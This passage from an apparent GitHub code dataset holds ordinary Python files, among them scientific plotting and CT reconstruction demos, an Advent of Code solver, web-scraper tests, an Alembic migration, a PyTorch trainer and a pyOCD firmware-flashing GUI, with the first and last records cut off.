Default: True\n\n return_figure: return the figure object for further manipulation. Default: False\n\n \"\"\"\n if include_layout:\n fig, all_axis = plt.subplots(2, gridspec_kw={\"height_ratios\": [4, 1]}, **kwargs)\n ax_layout = all_axis[-1]\n ax_plot = [all_axis[0]]\n else:\n fig, all_axis = plt.subplots(**kwargs)\n ax_plot = [all_axis]\n\n # collect axes\n if isinstance(ykeys, str):\n ykeys = [ykeys]\n\n if ykeys2:\n if isinstance(ykeys2, str):\n ykeys2 = [ykeys2]\n ax_twinx = ax_plot[0].twinx()\n ax_plot.append(ax_twinx)\n\n # No need for a legend if there is only one plot\n if len(ykeys) == 1 and not ykeys2:\n include_legend = False\n\n # assert xkey == 'mean_z', 'TODO: other x keys'\n\n X = genesis4_object.stat(xkey)\n\n # Only get the data we need\n if xlim:\n good = np.logical_and(X >= xlim[0], X <= xlim[1])\n X = X[good]\n else:\n xlim = X.min(), X.max()\n good = slice(None, None, None) # everything\n\n # X axis scaling\n units_x = str(genesis4_object.units(xkey))\n if nice:\n X, factor_x, prefix_x = nice_array(X)\n units_x = prefix_x + units_x\n else:\n factor_x = 1\n\n # set all but the layout\n\n # Handle tex labels\n xlabel = mathlabel(xkey, units=units_x, tex=tex)\n\n for ax in ax_plot:\n ax.set_xlim(xlim[0] / factor_x, xlim[1] / factor_x)\n ax.set_xlabel(xlabel)\n\n # Draw for Y1 and Y2\n\n linestyles = [\"solid\", \"dashed\"]\n\n ii = -1 # counter for colors\n for ix, keys in enumerate([ykeys, ykeys2]):\n if not keys:\n continue\n ax = ax_plot[ix]\n linestyle = linestyles[ix]\n\n # Check that units are compatible\n ulist = [genesis4_object.units(key) for key in keys]\n if len(ulist) > 1:\n for u2 in ulist[1:]:\n assert ulist[0] == u2, f\"Incompatible units: {ulist[0]} and {u2}\"\n # String representation\n unit = str(ulist[0])\n\n # Data\n data = [genesis4_object.stat(key)[good] for key in keys]\n\n if nice:\n factor, prefix = nice_scale_prefix(np.ptp(data))\n unit = prefix + unit\n else:\n factor = 1\n\n # Make a line and point\n for key, dat in zip(keys, data):\n #\n ii += 1\n color = \"C\" + str(ii)\n\n # Handle tex labels\n label = mathlabel(key, units=unit, tex=tex)\n ax.plot(X, dat / factor, label=label, color=color, linestyle=linestyle)\n\n # Handle tex labels\n ylabel = mathlabel(*keys, units=unit, tex=tex)\n ax.set_ylabel(ylabel)\n \n # Scaling(e.g. \"linear\", \"log\", \"symlog\", \"logit\")\n if ix == 0:\n ax.set_yscale(yscale)\n else:\n ax_twinx.set_yscale(yscale2)\n\n # Set limits, considering the scaling.\n if ix == 0 and ylim:\n ymin = ylim[0]\n ymax = ylim[1]\n # Handle None and scaling\n if ymin is not None:\n ymin = ymin / factor\n if ymax is not None:\n ymax = ymax / factor\n new_ylim = (ymin, ymax)\n ax.set_ylim(new_ylim)\n # Set limits, considering the scaling.\n if ix == 1 and ylim2:\n pass\n # TODO\n if ylim2:\n ymin2 = ylim2[0]\n ymax2 = ylim2[1]\n # Handle None and scaling\n if ymin2 is not None:\n ymin2 = ymin2 / factor\n if ymax2 is not None:\n ymax2 = ymax2 / factor\n new_ylim2 = (ymin2, ymax2)\n ax_twinx.set_ylim(new_ylim2)\n else:\n pass\n\n # Collect legend\n if include_legend:\n lines = []\n labels = []\n for ax in ax_plot:\n a, b = ax.get_legend_handles_labels()\n lines += a\n labels += b\n ax_plot[0].legend(lines, labels, loc=\"best\")\n\n # Layout\n if include_layout:\n # Gives some space to the top plot\n ax_layout.set_ylim(-1, 1.5)\n\n # if xkey == 'mean_z':\n # ax_layout.set_xlim(xlim[0], xlim[1])\n # else:\n # ax_layout.set_xlabel('mean_z')\n # xlim = (0, I.stop)\n add_layout_to_axes(genesis4_object, ax=ax_layout, bounds=xlim)\n\n if return_figure:\n return fig\n","repo_name":"slaclab/lume-genesis","sub_path":"genesis/version4/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"25213796228","text":"\"\"\"\nscatter.py\n==========\n\nThis module provides a function to display a scatter plot using the ClusterFun library.\nIt allows users to create a scatter plot of two columns of data.\n\"\"\"\nfrom typing import Optional\n\nimport pandas as pd\n\nfrom clusterfun.config import Config\nfrom clusterfun.plot import Plot\nfrom clusterfun.plot_types import DOCSTRING_STANDARD\nfrom clusterfun.storage.local.helpers import get_columns_for_db\nfrom clusterfun.validation import validate\n\n\ndef scatter(\n df: pd.DataFrame,\n x: str,\n y: str,\n media: str,\n color: Optional[str] = None,\n bounding_box: Optional[str] = None,\n title: Optional[str] = None,\n show: bool = True,\n): # pylint: disable=too-many-arguments,missing-function-docstring\n cfg = Config(\n type=\"scatter\",\n x=x,\n y=y,\n media=media,\n columns=get_columns_for_db(df, media, \"scatter\", x, y),\n color=color,\n bounding_box=bounding_box,\n title=title,\n )\n validate(df, cfg)\n return Plot.save(df, cfg).show(show)\n\n\nscatter.__doc__ = (\n \"\"\"\n :param df: pd.DataFrame\n The dataframe with the data to plot\n :param x: str\n The column name of the data to plot on the x-axis.\n :param y: str\n The column name of the data to plot on the y-axis.\n \"\"\"\n + DOCSTRING_STANDARD\n)\n","repo_name":"gietema/clusterfun","sub_path":"clusterfun/plot_types/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"5"} +{"seq_id":"3639697738","text":"import tigre\nimport numpy as np\nfrom tigre.utilities import sample_loader\nfrom tigre.utilities import CTnoise\nimport tigre.algorithms as algs\nfrom matplotlib import pyplot as plt\n\n#%% Geometry\ngeo = tigre.geometry_default(high_resolution=False)\n\n#%% Load data and generate projections\n# define angles\nangles = np.linspace(0, 2 * np.pi, 100)\n# Load thorax phatom data\nhead = sample_loader.load_head_phantom(geo.nVoxel)\n# generate projections\nprojections = tigre.Ax(head, geo, angles)\n# add noise\nnoise_projections = CTnoise.add(projections, Poisson=1e5, Gaussian=np.array([0, 10]))\n\n#%% Usage CGLS\n#\n#\n# CGLS has the common 4 inputs for iterative algorithms in TIGRE:\n#\n# Projections, geometry, angles, and number of iterations\n#\n# Additionally it contains optional initialization tehcniques, but we\n# reccomend not using them. CGLS is already quite fast and using them may\n# lead to divergence.\n# The options are:\n# 'Init' Describes diferent initialization techniques.\n# - 'none' : Initializes the image to zeros (default)\n# - 'FDK' : intializes image to FDK reconstrucition\n# - 'multigrid': Initializes image by solving the problem in\n# small scale and increasing it when relative\n# convergence is reached.\n# - 'image' : Initialization using a user specified\n# image. Not recomended unless you really\n# know what you are doing.\n# 'InitImg' an image for the 'image' initialization. Avoid.\n\n# # use CGLS\nimgCGLS, normL2CGLS = algs.cgls(noise_projections, geo, angles, 30, computel2=True)\n# use LSQR\nimgLSQR, normL2LSQR = algs.lsqr(noise_projections, geo, angles, 30, computel2=True)\n# use LSMR\nimgLSMR, normL2LSMR = algs.lsmr(noise_projections, geo, angles, 30, computel2=True,lmbda=0)\nimgLSMR2, normL2LSMR2 = algs.lsmr(noise_projections, geo, angles, 30, computel2=True,lmbda=30)\n# use LSQR\nimghLSQR, normhL2LSQR = algs.hybrid_lsqr(noise_projections, geo, angles, 30, computel2=True)\n\n# AB/BA-GMRES\nimgabgmres, normhabgmres = algs.ab_gmres(noise_projections, geo, angles, 30, computel2=True)\nimgbagmres, normhbagmres = algs.ba_gmres(noise_projections, geo, angles, 30, computel2=True)\n# # AB/BA-GMRES with FDK backprojector\nimgabgmresfdk, normhabgmresfdk = algs.ab_gmres(noise_projections, geo, angles, 30, computel2=True,backprojector=\"FDK\")\nimgbagmresfdk, normhbagmresfdk = algs.ba_gmres(noise_projections, geo, angles, 30, computel2=True,backprojector=\"FDK\")\n\n\n# SIRT for comparison.\nimgSIRT, normL2SIRT = algs.sirt(noise_projections, geo, angles, 60, computel2=True)\n\n#%% plot results\n#\n# We can see that CGLS gets to the same L2 error in less amount of\n# iterations.\n\n\n\nplt.plot(np.vstack((normL2CGLS[0, :], normL2SIRT[0, 0:30],normL2LSMR[0, :],normL2LSMR2[0, :],normhL2LSQR[0, :],normhabgmres[0,:],normhbagmres[0,:],normhabgmresfdk[0,:],normhbagmresfdk[0,:])).T)\nplt.title(\"L2 error\")\nplt.xlabel(\"Iteration\")\nplt.ylabel(\"$ |Ax-b| $\")\nplt.gca().legend((\"CGLS\", \"SIRT\",\"LSMR lambda=0\", \"LSMR lambda=30\",\"hybrid LSQR\",\"AB-GMRES\",\"BA-GMRES\",\"AB-GMRES FDK\",\"BA-GMRES FDK\"))\nplt.show()\n# plot images\ntigre.plotimg(np.concatenate([np.concatenate([imgCGLS, imgSIRT, imgLSQR,imgabgmres,imgabgmresfdk],axis=1),np.concatenate([imgLSMR, imgLSMR2, imghLSQR,imgbagmres,imgbagmresfdk], axis=1)], axis=2), dim=\"z\", step=2,clims=[0, 2])\n# plot errors\ntigre.plotimg(np.concatenate([np.concatenate([head-imgCGLS, head-imgSIRT, head-imgLSQR, head-imgabgmres, head-imgabgmresfdk],axis=1),np.concatenate([head-imgLSMR, head-imgLSMR2, head-imghLSQR,head-imgbagmres,head-imgbagmresfdk], axis=1)], axis=2), dim=\"z\", slice=32)\n","repo_name":"CERN/TIGRE","sub_path":"Python/demos/d08_Algorithms03.py","file_name":"d08_Algorithms03.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":450,"dataset":"github-code","pt":"5"} +{"seq_id":"44474578114","text":"from analyze import analyze\nfrom aylienapiclient import textapi\n\nclient = textapi.Client(\"\", \"\")\n\ndef summarizeArticle(url):\n\tsummary = \"\"\n\tsummaryResponse = client.Summarize({'url': url, 'sentences_number': 4})\n\tfor sentence in summaryResponse['sentences']:\n\t\tsummary += \"--\" + sentence +\"\\n\\n\"\n\treturn summary\n","repo_name":"bcaton85/Summary","sub_path":"backend/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11469682389","text":"n = int(input())\nd={}\nfor i in range(n):\n a = int(input())\n if a in d:\n d[a]+=1\n else:\n d.update({a:1})\na = list(d.keys())\nif(len(d)==2 and d[a[0]]==d[a[1]]):\n print(\"YES\")\n print(\"{} {}\".format(a[0],a[1]))\nelse:\n print(\"NO\")","repo_name":"shaarangg/CP-codes","sub_path":"codeforces/Python/fair_game.py","file_name":"fair_game.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70878563991","text":"import request\nimport re\n\n\ndef part_one(rules, messages):\n patterns = to_patterns(rules)\n count = 0\n\n for message in messages:\n if re.fullmatch(patterns['0'], message):\n count += 1\n\n return count\n\n\ndef part_two(rules, messages):\n rules['8'] = '(42)+'\n rules['11'] = ' | '.join([' '.join(['42'] * i) + ' ' + ' '.join(['31'] * i) for i in range(1, 10)])\n patterns = to_patterns(rules)\n count = 0\n\n for message in messages:\n if re.fullmatch(patterns['0'], message):\n count += 1\n\n return count\n\n\ndef to_rules(text):\n rules = {}\n\n for line in text.splitlines():\n (key, value) = line.split(': ')\n rules[key] = value\n\n return rules\n\n\ndef to_patterns(rules):\n patterns = {}\n items = list(rules.items())\n\n while items:\n for i in reversed(range(len(items))):\n key, value = items[i]\n\n if not re.search(r'\\d', value):\n if re.search(r'\\|', value):\n patterns[key] = f'({value.replace(\" \", \"\")})'\n else:\n patterns[key] = value.replace(' ', '')\n\n items.pop(i)\n\n for key, value in patterns.items():\n for i in reversed(range(len(items))):\n k, v = items[i]\n m = re.sub(fr'(^|(?<=\\(|\\s)){key}((?=\\s|\\))|$)', value, v)\n\n if m:\n items[i] = (k, m)\n\n return patterns\n\n\ndef main():\n text = request.get('https://adventofcode.com/2020/day/19/input')\n inputs = text.strip().replace('\"', '').split('\\n\\n')\n rules = to_rules(inputs[0])\n messages = inputs[1].splitlines()\n print('* Part One:', part_one(rules, messages))\n print('** Part Two:', part_two(rules, messages))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fredrik-sy/AoC2020","sub_path":"day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22874300636","text":"import os\nfrom common.request_utils import RequestUtils\nfrom common.testdata_utils import TestdataUtils\n\ncurrent=os.path.dirname(__file__)\ndata_path=os.path.join(current,'../data/test_case1.xlsx')\nprint(data_path)\n\nallcase=TestdataUtils('Sheet1').get_testcase_data_list()\nfor case_info in allcase:\n\n Result=RequestUtils().request_by_step(case_info.get('case_info'))\n print(Result)\n","repo_name":"Mmeiapple/Request_unittest","sub_path":"api_testcase/excel_data.py","file_name":"excel_data.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74407454872","text":"\nimport random\n\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\n\nnums = [random.uniform(1, 10) for i in range(10)]\n\n\nnums_groups = list(chunks(nums, 4))\n\n\nprint(nums_groups)","repo_name":"benjaminhuanghuang/code-snippets","sub_path":"list-chunk/list-chunk.py","file_name":"list-chunk.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16305495388","text":"from trawler.browsers import BrowseBing, BrowseStackOverFlow, BrowseStackOverFlowDocumentation\nfrom trawler.browsers.exceptions import BrowerScrapeMethodNotImplemented\nimport pytest\nfrom trawler.settings import DEFAULT_MAX_RESULTS_PER_PAGE\n\n\ndef test_browse_with_bing():\n max_page = 1\n bing = BrowseBing(kw=\"Ravi RT Merugu\", max_page=max_page)\n bing.search()\n result = bing.data\n assert bing.data['result_count'] != 0\n assert bing.data[ 'result_count'] <= DEFAULT_MAX_RESULTS_PER_PAGE * max_page\n assert \"selenium-htmlunit\" == bing.shift_method()\n assert type(result) is dict\n assert \"result\" in result\n assert \"related_keywords\" in result\n bing.close()\n\n\ndef test_browse_with_bing_source_enin():\n max_page = 2\n bing = BrowseBing(kw=\"Ravi RT Merugu\", max_page=max_page, source=\"en-in\")\n bing.search()\n result = bing.data\n assert bing.data['result_count'] != 0\n assert bing.data['result_count'] <= DEFAULT_MAX_RESULTS_PER_PAGE * max_page\n assert \"selenium-htmlunit\" == bing.shift_method()\n assert type(result) is dict\n assert \"result\" in result\n assert \"related_keywords\" in result\n bing.close()\n\n\ndef test_browse_with_bing_source_enus():\n max_page = 1\n bing = BrowseBing(kw=\"Ravi RT Merugu\", max_page=max_page, source=\"en-us\")\n bing.search()\n result = bing.data\n assert bing.data['result_count'] != 0\n assert bing.data['result_count'] <= DEFAULT_MAX_RESULTS_PER_PAGE * max_page\n assert \"selenium-htmlunit\" == bing.shift_method()\n assert type(result) is dict\n assert \"result\" in result\n assert \"related_keywords\" in result\n bing.close()\n\n\n\ndef test_browser_with_stackoverflow():\n stack = BrowseStackOverFlow(kw=\"Python Exception errors\", max_page=1)\n stack.search()\n result = stack.data\n assert type(result) is dict\n assert \"result\" in result\n assert \"related_keywords\" in result\n stack.close()\n\n\ndef test_browser_no_nextpage():\n bing = BrowseBing(kw=\"XxXXXXXXxxxxxbas dans dsand msad asd amd ansd am dna smda sdn asdmas dm\", max_page=1)\n bing.search()\n result = bing.data\n assert result['next_url'] is None\n bing.close()\n\n\ndef test_browser_implamentation_error():\n with pytest.raises(BrowerScrapeMethodNotImplemented) as excinfo:\n bing = BrowseBing(kw=\"Hello\", max_page=1, method=\"chromejjj\")\n bing.search()\n bing.close()\n assert \"Not implemented\" in str(excinfo)\n","repo_name":"rrmerugu/trawler","sub_path":"tests/test_browser.py","file_name":"test_browser.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"40561085508","text":"import subprocess\n\nobj = 'BHR001'\nfname = 'out-2mass-' + obj\nlobj = '-c=%s' % obj\n\n# command to execute in bash\ncommand = ['vizquery',\n '-source=II/246',\n '-c.bm=45x45',\n '-out=RAJ2000 DEJ2000 Jmag Jcmsig Hmag Hcmsig Kmag Kcmsig',\n '-out.form=mini',\n lobj,\n 'Jcmsig=<0.03',\n 'Hcmsig=<0.03',\n 'Kcmsig=<0.03',\n 'Qflg=AAA']\n\n# save data\nwith open(fname, 'wb') as out:\n p = subprocess.Popen(command, stdout=out)\n p.wait()\n\n# erease first 49 lines\nlines = open(fname).readlines()\nopen(fname, 'w').writelines(lines[49:-1])\n\nprint(\"\\nData for \" + obj + \" is ready!\\n\")\n","repo_name":"gracca/2MASSdist","sub_path":"data2MASSdist.py","file_name":"data2MASSdist.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42505256018","text":"\"\"\"empty message\n\nRevision ID: 93b501c2e5f6\nRevises: 8c4cf25f4e2b\nCreate Date: 2018-08-27 18:01:12.364963\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"93b501c2e5f6\"\ndown_revision = \"8c4cf25f4e2b\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"comment\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"body\", sa.Text(), nullable=True),\n sa.Column(\"timestamp\", sa.DateTime(), nullable=True),\n sa.Column(\"user_id\", sa.Integer(), nullable=True),\n sa.Column(\"post_id\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint([\"post_id\"], [\"post.id\"]),\n sa.ForeignKeyConstraint([\"user_id\"], [\"user.id\"]),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\n op.f(\"ix_comment_timestamp\"), \"comment\", [\"timestamp\"], unique=False\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f(\"ix_comment_timestamp\"), table_name=\"comment\")\n op.drop_table(\"comment\")\n # ### end Alembic commands ###\n","repo_name":"arajmaharjan/WOU-CIS-Cousework","sub_path":"Wolfit/migrations/versions/93b501c2e5f6_add_comments.py","file_name":"93b501c2e5f6_add_comments.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"1662090246","text":"from typing import Dict, Type\nfrom os.path import basename\n\nfrom regex import search, compile\n\nfrom ...interfaces import ExtractLogInfosInterface\n\nclass ExtractLogInfos(ExtractLogInfosInterface):\n def __init__(self, log_path: str, error_class: Type[Exception]) -> None:\n self.__log_name = log_path\n self.__error_class = error_class\n self.__seconds = self.get_seconds()\n self.__bitrate = self.get_bitrate()\n \n def get_seconds(self) -> int:\n with open(self.__log_name, 'r') as f:\n file = f.readlines()\n for line in file:\n if 'Duration' in line:\n # Duration == Duration: 00:23:40.09...\n duration = line.strip().split(' ')[1][:-1:] # Extract the time and remove ','\n duration = duration.replace('.', ':')\n duration = duration.split(':')\n hour = int(duration[0]) * 3600\n minute = int(duration[1]) * 60\n second = int(duration[2])\n seconds = hour + minute + second\n return seconds\n return 1\n\n def get_bitrate(self) -> int:\n # ... Audio ... 44100 Hz ... 128 kb/s...\n bitrate_regex = compile(r'([0-9]{3} kb\\/s)') # Regex to extract bitrate\n with open(self.__log_name, 'r') as f:\n file = f.readlines()\n for line in file:\n #if search(hertz_regex, line):\n if 'bitrate' in line:\n bitrate_str_pos = search(bitrate_regex, line)\n if bitrate_str_pos == None:\n raise self.__error_class('Log Error!')\n else:\n bitrate_str_pos = bitrate_str_pos.span()\n bitrate_str = \\\n line[bitrate_str_pos[0]:bitrate_str_pos[1]].replace(' kb/s', '')\n return int(bitrate_str)\n return 128\n\n def get_current_file_size(self) -> Dict[str, int]:\n total_file_size_regex = compile(r'(?<=(audio:))(.*)(?=(kBs))')\n current_file_size_regex = compile(r'(?<=(size=))(.*)(?=(kB))')\n cases = (\n ('size', 'in conversion', current_file_size_regex),\n ('audio', 'completed', total_file_size_regex)\n ) # ('key', 'message', regex)\n with open(self.__log_name, 'r') as f:\n file = f.readlines()\n file = [line for line in file if line != '\\n'] # Ignore empty lines\n last_line = file[-1].replace(' ', '')\n\n # Verify error\n\n if 'Exiting' in last_line:\n raise self.__error_class('Conversion Error!')\n\n for case, message, regex in cases:\n if case in last_line:\n pos = search(regex, last_line).span()\n size = int(last_line[pos[0]:pos[1]])\n return {message: size}\n raise self.__error_class('Log Error!')\n \n def get_estimated_file_size(self) -> int:\n return int((self.__seconds * self.__bitrate) / 8)\n\n def get_filename(self) -> str:\n filename_regex = compile(r\"(?<=to\\s\\')(.*)(?=\\')\")\n with open(self.__log_name, 'r') as f:\n file = f.readlines()\n for line in file:\n if 'Output' in line:\n pos = search(filename_regex, line).span()\n if pos == None:\n raise self.__error_class('Log Error!')\n filename = line[pos[0] : pos[1]]\n return basename(filename) # Remove path and return filename\n raise self.__error_class('Log Error!')","repo_name":"JoaoEmanuell/mp3-api","sub_path":"routes/api/source/conversor/ffmpeg/extract_log_infos.py","file_name":"extract_log_infos.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12273812158","text":"import os\nimport time\nimport random\nfrom collections import Counter\n\nimport torch\nimport numpy as np\n\n\ndef cut_model_state_dict(state_dict):\n state_dict.pop(\"fc2.weight\")\n state_dict.pop(\"fc2.bias\")\n state_dict.pop(\"bn2.weight\")\n state_dict.pop(\"bn2.bias\")\n state_dict.pop(\"bn2.running_mean\")\n state_dict.pop(\"bn2.running_var\")\n state_dict.pop(\"bn2.num_batches_tracked\")\n state_dict.pop(\"center_features.weight\") if state_dict[\"center_features.weight\"] is not None else None\n\n\nclass Trainer:\n \"\"\"모델 학습 및 평가를 위한 클래스\"\"\"\n\n def __init__(self, model, args, logging=True, pretext=False):\n self.args = args\n self.model = model\n self.model.cuda()\n self.logging = logging\n self.pretext = pretext\n self.model_name = f\"{self.model.__class__.__name__}_{str(time.time()).split('.')[0]}\"\n self.best_accuracy = 0\n\n def train(self):\n \"\"\"모델을 학습\"\"\"\n self.write_log(f\"Start training {self.model_name}\", mode=\"w\")\n \n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.args.lr)\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[30, 80, 120], gamma=0.333) # changed\n\n train_data_loader = self.model.get_train_data_loader()\n val_data_loader = self.model.get_test_data_loader()\n\n self.write_log(\"\")\n for key, val in self.args.__dict__.items():\n self.write_log(f\"{key}: {val}\")\n self.write_log(\"\")\n\n for epoch in range(self.args.epochs):\n start_time = time.time()\n self.write_log(f\"Epoch {epoch + 1:03d}/{self.args.epochs:03d} | LR: {self.optimizer.param_groups[0]['lr']:.6f}\")\n self.train_epoch(train_data_loader)\n self.write_log(f\"Time elapsed: {(time.time() - start_time) / 60:.2f} mins.\")\n\n if self.pretext: # pretext 모델인 경우 evaluation 없이 모델 저장\n torch.save(self.model.state_dict(), f\"results/train/weights/{self.model_name}.pt\")\n self.write_log(\"Saved model!\")\n elif (epoch + 1) % 10 == 0: # N 에폭마다 evaluation 진행\n self.eval(val_data_loader)\n \n def train_epoch(self, data_loader):\n \"\"\"모델을 1에폭 학습\"\"\"\n\n self.model.train()\n\n # 학습 추적을 위한 리스트\n cost_list = list()\n ind_cost_list = list()\n\n for batch_idx, data in enumerate(data_loader):\n cost, ind_costs = self.model.get_cost(data)\n\n self.optimizer.zero_grad()\n cost.backward()\n self.optimizer.step()\n\n cost_list.append(cost.item())\n ind_cost_list.append(ind_costs)\n \n if (batch_idx + 1) % 10 == 0 or (batch_idx + 1) == len(data_loader):\n self.write_log(f\"Batch: {batch_idx + 1:04d}/{len(data_loader):04d} | Cost: {np.mean(cost_list):.4f} {np.round(np.mean(ind_cost_list, axis=0), 3)}\")\n\n # 학습 추적을 위한 리스트 초기화\n cost_list = list()\n ind_cost_list = list()\n\n self.scheduler.step()\n \n def eval(self, data_loader, train=True, save=False):\n \"\"\"모델을 evaluation 혹은 추론\"\"\"\n self.model.eval()\n\n img1_path_list = list()\n img2_path_list = list()\n labels_list = list()\n label_preds_list = list()\n\n for idx, data in enumerate(data_loader):\n print(f\"Evaluation Batch: {idx + 1:04d}/{len(data_loader):04d}\", end=\"\\r\")\n\n img1_path, img2_path, labels, label_preds = self.model.evaluate(data)\n img1_path_list.extend(img1_path)\n img2_path_list.extend(img2_path)\n labels_list.extend(labels)\n label_preds_list.extend(label_preds)\n print()\n \n threshold = np.median(label_preds_list)\n self.write_log(f\"Threshold: {threshold:.4f}\")\n\n label_preds_list = np.array(label_preds_list) > threshold\n accuracy = np.mean(np.array(labels_list).astype(bool) == np.array(label_preds_list).astype(bool))\n self.write_log(f\"Accuracy: {accuracy:.6f}\")\n\n # 학습 중일 경우 최고의 validation 성능을 낸 모델 저장\n if train:\n if accuracy > self.best_accuracy:\n self.best_accuracy = accuracy\n\n # Inference에 사용되지 않는 layer를 덜어내고 모델을 저장\n state_dict = self.model.state_dict()\n cut_model_state_dict(state_dict)\n torch.save(state_dict, f\"results/train/weights/{self.model_name}.pt\")\n self.write_log(\"Saved best model!\")\n \n # 필요한 경우 prediction 결과를 저장\n if save:\n with open(f\"results/test/{self.args.model_weight.split('/')[-1].split('.')[0]}_preds.csv\", \"w\") as result:\n result.write(f\"image1,image2,label\\n\")\n for img1_path, img2_path, pred in zip(img1_path_list, img2_path_list, label_preds_list):\n result.write(f\"{img1_path},{img2_path},{int(pred)}\\n\")\n\n def write_log(self, msg, mode=\"a\"):\n \"\"\"로그 파일 작성\"\"\"\n if self.logging:\n with open(f\"results/train/logs/{self.model_name}.log\", mode) as log:\n log.write(f\"{msg}\\n\")\n print(msg)\n","repo_name":"jessekim-ck/2020-ai-challenge-04","sub_path":"src/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"} +{"seq_id":"42555411066","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport os\nfrom pyocd.core.helpers import ConnectHelper\nfrom pyocd.target.builtin import BUILTIN_TARGETS\n# from pyocd.target.pack import pack_target ManagedPacks\nfrom pyocd.target.pack.pack_target import ManagedPacks\nfrom PyQt5.QtWidgets import QApplication, QComboBox, QWidget, QVBoxLayout, QTableWidgetItem, QFileDialog, QMessageBox\nfrom daplink_flash_ui import *\nimport pyocd.core\nfrom pyocd.core.memory_map import MemoryType\n# import cmsis_pack_manager\nfrom pyocd.target.pack.cmsis_pack import (CmsisPack, MalformedCmsisPackError)\nfrom pyocd.flash.file_programmer import FileProgrammer\nimport logging\nfrom pyocd.target import TARGET\n\nclass Flash_Loader(object):\n\n def __init__(self):\n app = QApplication(sys.argv)\n self.window = QWidget()\n\n self.ui = Ui_Form()\n self.ui.setupUi(self.window)\n self.session = None\n\n\n probes = ConnectHelper.get_all_connected_probes(blocking=False)\n for probe in probes:\n self.ui.daplink_list.addItem(probe.description)\n if len(probes) > 0:\n self.probe = probes[0]\n # print(self.probe)\n else:\n self.probe = None\n \n\n # logger = logging.getLogger(__name__)\n # logger.setLevel(level=logging.DEBUG)\n\n # StreamHandler\n # stream_handler = logging.StreamHandler(self.ui.log.append)\n # stream_handler.setLevel(level=logging.DEBUG)\n # logger.addHandler(stream_handler)\n\n self.ui.flash.clicked.connect(self.flash_device_run)\n self.ui.update_dap.clicked.connect(self.update_daplink)\n self.ui.connect.clicked.connect(self.open_session)\n self.ui.selsec_firmware.clicked.connect(self.select_file)\n self.ui.daplink_list.currentIndexChanged.connect(self.daplink_change)\n\n self.ui.flash.setDisabled(True)\n self.ui.progressBar.setValue(0)\n self.window.show()\n app.exec_()\n\n\n def daplink_change(self):\n probes = ConnectHelper.get_all_connected_probes(blocking=False)\n\n for probe in probes:\n if probe.description == self.ui.daplink_list.currentText():\n self.probe = probe\n else:\n self.probe = None\n def open_session(self):\n if self.session is not None and self.session.is_open:\n self.session.close()\n\n if self.probe is None:\n QMessageBox.information(self.window, \"ERROR\", \"No probe\", QMessageBox.Ok)\n return\n\n target_device = \"stm32f103c8\"\n\n if target_device not in TARGET:\n QMessageBox.information(self.window, \"ERROR\", \"MCU not supported\", QMessageBox.Ok)\n return\n\n self.session = ConnectHelper.session_with_chosen_probe(\n target_override=target_device,unique_id=self.probe.unique_id)\n self.session.open()\n\n # print(self.probe.unique_id)\n board = self.session.board\n self.target = board.target\n\n memory_map = board.target.get_memory_map()\n ram_region = memory_map.get_default_region_of_type(MemoryType.RAM)\n rom_region = memory_map.get_boot_memory()\n\n self.addr_bin = rom_region.start\n self.ui.flash.setEnabled(True)\n\n def flash_device(self):\n print(\"flash device\")\n if os.path.exists(self.ui.filepath.text()):\n self.ui.log.append(\"Start flashing\")\n FileProgrammer(self.session, progress=self.progress_monitor).program(self.ui.filepath.text(), base_address=self.addr_bin)\n self.ui.log.append(\"Finish flashing\")\n else:\n QMessageBox.critical(self.window,\"ERROR\",\"Firmware is not exist\",QMessageBox.Yes)\n\n\n def flash_device_run(self):\n\n if os.path.exists(self.ui.filepath.text()):\n self.ui.log.append(\"Start flashing\")\n FileProgrammer(self.session, progress=self.progress_monitor).program(\n self.ui.filepath.text(), base_address=self.addr_bin)\n 